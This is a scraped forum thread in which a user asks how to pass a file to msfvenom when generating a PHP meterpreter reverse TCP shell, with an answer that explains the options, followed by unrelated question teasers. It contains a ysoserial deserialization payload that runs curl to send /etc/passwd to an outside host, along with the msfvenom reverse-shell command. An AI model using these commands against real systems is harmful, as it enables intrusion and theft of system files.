How to 'path a file' when generate Metasploit shell?

I want to path a file with generate Metasploit shell. It is like this:

java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64

like -F file in example, I want to path a file in command:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

This is just command I want to path a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.

Answers


As I understand, you are using msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will bring you command shell of the target host).

This payload is a part of Metasploit framework - a predefined program, not your custom script and you want to pass your file to it. If so, it all depends on the Meterpreter's parameters to pass anything to it. But it seems that there is no such option as just path a some file in Meterpreter.

In example with curl the -F option is recognized by cURL application and stands for HTTP Forms posting and directs web server for file uploading with given by property name file.

But what path to file you want to pass to the Meterpreter payload? What is your final goal? Now it looks like no sense for it.

  UPDATE for you comment

The curl is a different application and they use -F option format implemented. In msfvenom use to pass variable CUSTOM1 the following form:

msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...


Need Your Help

Android: Moving an ImageView from updating Values in a Thread

java android multithreading

I am trying to make the ImageView missile1 to spawn at a random y-coordinate on the right edge of the screen and then move it left across the screen until it is off the screen, and finally move it ...

Highlight query in search results in special characters

php highlight substr

I have this PHP code to highlight the Query on search results.